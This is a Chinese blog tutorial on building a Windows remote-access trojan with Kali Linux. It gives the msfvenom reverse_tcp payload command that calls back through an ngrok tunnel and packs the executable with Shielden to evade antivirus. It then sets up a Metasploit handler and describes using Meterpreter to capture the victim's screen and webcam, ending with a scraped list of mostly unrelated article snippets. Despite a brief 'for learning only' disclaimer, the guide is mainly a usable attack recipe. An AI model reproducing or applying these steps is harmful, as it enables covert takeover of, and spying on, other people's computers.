使用KALI生成木马病毒实现远程控制

前言

   该文章内容仅用于学习使用Kali Linux系统,请不要将它用于非法的途径,如有意外概不负责。

   

   我将会详细介绍使用Kali Linux系统生成木马并用它远程控制一台处在外网的物理计算机,使用到的工具有:

   1、VMware Workstation Pro 16(虚拟机)

   下载地址:https://www.vmware.com/cn/products/workstation-pro/workstation-pro-evaluation.html

   2、Kali Linux 2021(系统)

   下载地址:https://www.kali.org/downloads/

   3、Sunny-Ngrok(内网穿透服务)

   登录地址:https://ngrok.cc/login.html

   4、Shielden(加壳小工具)

   下载地址:http://www.safengine.com/downloads/get-demo

   

   网络如山勤思为径,信息似海安全作舟,牢记网络安全,开始我们接下来的学习。

一、安装虚拟机和系统

   安装步骤很简单,可自行百度,网络适配器选择桥接模式,要保证你的Kali Linux能连上网。

二、开通隧道

   注册并登录Sunny-Ngrok,根据自己的情况选择开通一条隧道,我这里选的是这个免费的。

隧道协议选择tcp,隧道名称自己随便起,远程端口选一个能用的顺眼的(他会给你推荐几个能用的端口),本地端口需要填写你Kali Linux系统的IP地址(用ifconfig命令可查看),冒号后面填一个你喜欢的数字(我一般都用8888),本地端口可以随时修改,确认信息无误后点击确认添加。

打开隧道管理,点击客户端下载,将下载后的压缩文件拖进Kali Linux系统里并解压。

使用cd命令进入该文件夹,通过ls命令可以看到里面有个“sunny”文件。

通过./sunny clientid 隧道ID命令开启隧道。

隧道开启成功后是这样子:

三、生成木马

   重新打开一个终端窗口,输入下列命令回车,他会在root文件夹下生成一个Windows的可执行文件muma.exe。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=服务器地址 LPORT=隧道端口 -f exe > /root/muma.exe

1

这时候要注意,先把自己物理机上的所有杀毒软件退出,因为这是没有加壳的木马文件,会立即被删除,退出杀毒软件后直接将muma.exe拖进物理机即可。

四、加壳免杀

   为防止被杀毒软件杀掉,就需要对它进行加壳。

   这里用到一个简单方便的加壳工具:Shielden。

将muma.exe拖进去,设置一些参数,如果对这个工具不熟悉的话可以百度学习一下,嫌麻烦的话就把能选的都选上,这里注意复杂度不要太高(我一般拉到66),太高可能导致该程序失效(这是我踩过的坑)。

下面这个就是加壳成功后的病毒文件了,因为这个加壳工具较小,不能做到专业全面的免杀,在遇到一些强力的杀毒软件的时候还是会被杀掉,所以就不要想着拿它做坏事了。经过我目前的测试,电脑管家一点都检测不出来,但会被火绒秒杀,不得不说火绒NB啊,别的杀毒软件我还没试过,就交给你们了。

五、远程控制

   该木马程序在任何人的电脑上只要不被杀掉,都是可以进行远程控制的,这里为了更加直观,我将用我的物理机作为被控制的对象。

   

   打开终端输入msfconsole回车,这样就打开了msfconsole。

输入use exploit/multi/handler回车。

输入set payload windows/meterpreter/reverse_tcp回车。

输入show options回车,可以看到Lhost和Lport是空的或不匹配的,这需要我们给他手动写入。

输入set lhost 本地IP和set lport 本地端口,这时候再用show options命令,就可以看到我们写入的信息了。

使用run命令启动并开始监听。

这时候我们双击物理机上的木马程序,该终端窗口就会做出反应。

到此,物理机的控制权就是我们的了,百度meterpreter的一些好玩的命令。

   

   一些基础的,比如查看物理机的IP地址(ipconfig):

甚至是截取物理机的电脑屏幕:

更甚至是调用物理机的摄像头拍照等等各种功能可自行搜索“Meterpreter的命令用法”

渗透外网测试KALI+隧道+加壳相关推荐

  1. Shadow broker=fuzzbunch+metasploit 攻击外网测试以及metasploit大批量扫描目标IP

    0x01 前言 4月14日,影子经纪人在steemit.com上公开了一大批NSA(美国国家安全局)"方程式组织" (Equation Group)使用的极具破坏力的黑客工具,其中 ...

  2. Linux工作笔记035---linux内网测试访问外网网速_外网测试访问内网网速

    JAVA技术交流QQ群:170933152 Linux内网测试访问外网网速:,可以用下载命令测试 外网访问内网,可以用下载工具下载内网的一个文件看就行. 顺便提一下.如果下载ftp服务器上的文件,可以 ...

  3. 使用网云穿内网穿透 实现外网访问内网金蝶(ERP)系统

    日常工作,生活中.我们可能会遇到一些这样的问题,在企业内部,每个公司会有专属的内部系统,比如erp,金蝶.用友.畅捷通等办公软件:这些软件在企业内网是可以正常访问的,但是在外网是无法访问的,如果在分公 ...

  4. .NET程序的代码混淆、加壳与脱壳

    通常我们通过代码混淆.加密的形式达到软件保护的目的.在Web开发里我们接触过的可能就是JS代码加密了,可以通过对JS代码进行混淆.加密从而实现对核心JS代码的保护.如果没有接触过的可以在这里简单了解一 ...

  5. 如何外网访问内网svn 网云穿内网穿透教你简单实现

    在没有服务器,没有公网IP的情况下,我们如何才能实现在外网访问局域网内的svn服务器:这个问题对于大多部分人来说是个头疼的问题:那么我们怎么做才能做到低成本实现在外网成功访问内网的svn呢? 今天我们 ...

  6. Linux防火墙配置—访问外网WEB

    一.实验目标 1.本次实验在"Linux基础网络搭建实验"的基础上,在外网虚拟机上搭建WEB服务,并分别配置外网和网关的防火墙规则,使内网能够访问WEB服务 2.Linux基础网络 ...

  7. 家里的电脑通过电信宽带设置成外网服务器

    家里的电脑通过电信宽带设置成外网服务器 事情原由 最近要和同事远程开发一个东西,需要一个外网的mysql数据库. 自己买的阿里云服务器只有1M的带宽,上面安装的mysql服务器连接很慢,且不稳定,内存 ...

  8. 让别人远程访问你的代码网站项目或临时演示你的项目给客户的方式详解即外网局域网访问自己的项目

    让别人远程访问你的代码网站项目或临时演示你的项目给客户的方式详解 文章目录 让别人远程访问你的代码网站项目或临时演示你的项目给客户的方式详解 引言 一.创建一个你想要别人访问的项目 二.明确你想要将这 ...

  9. ExeCryptor加壳的问题

    有一软件已稳定运行几年有余,今天想起要修改其中的一功能模块. 修改完了,重新编译,再加壳,用的是ExeCryptor2.25. 结果,程序总是出现CPU100%(或接近100%)的异常现象.百思不得其 ...

最新文章

  1. 【SSH项目实战】国税协同平台-26.分页功能编写
  2. MessagePack, Protocol Buffers和Thrift序列化框架原理和比较说明
  3. Space-Filling Designs
  4. node --- 模块化连接MongoDB数据库的参数设置方案之一
  5. linux扩容根目录空间_Linux系统扩容根目录磁盘空间的操作方法
  6. MVC常见的控制器,接口,数据层之间的操作
  7. 【2021新版】一线大厂 Go 高频面试题,整理分析合集
  8. 服务中没有telnet_win7 服务中没有 prints pooler
  9. postgresql基本命令操作
  10. Java基础:Collections集合、Map集合综合案例 —— 斗地主
  11. n的阶乘末尾含0的个数
  12. 【雷达通信】基于matlab GUI雷达定位模拟【含Matlab源码 304期】
  13. PDF转WORD工具破解版
  14. 学术蓝答辩PPT模板
  15. LLVM 系统入门¶
  16. 值得关注的5款“企业级低代码开发平台”推荐
  17. Unity各个坐标轴
  18. Java精准地图坐标转换 高德 百度 谷歌 腾讯 高德 批量转换工具类达到项目生产精度
  19. JAVA-win7的JDK环境变量配置安装
  20. 【洛谷P5514】永夜的报应【模拟】

热门文章

  1. 曙光服务器修改raid组名称,曙光Raid配置手册.pdf
  2. PHP7 中 ?? 与? :的区别
  3. cannot pass non-trivial object of type 'string' to variadic function
  4. 【Educational Cf Round 125 】A—D
  5. Spring Cloud、Spring Cloud Alibaba、Spring Boot版本对应关系
  6. 三国志战略版:Daniel_也甜也咸-青州兵分析
  7. 第五章:断翼-虚拟机栈
  8. MAthJax入门教程(五分钟上手)
  9. 软件设计期末OJ 思路+代码
  10. 张宇:高等数学知识结构图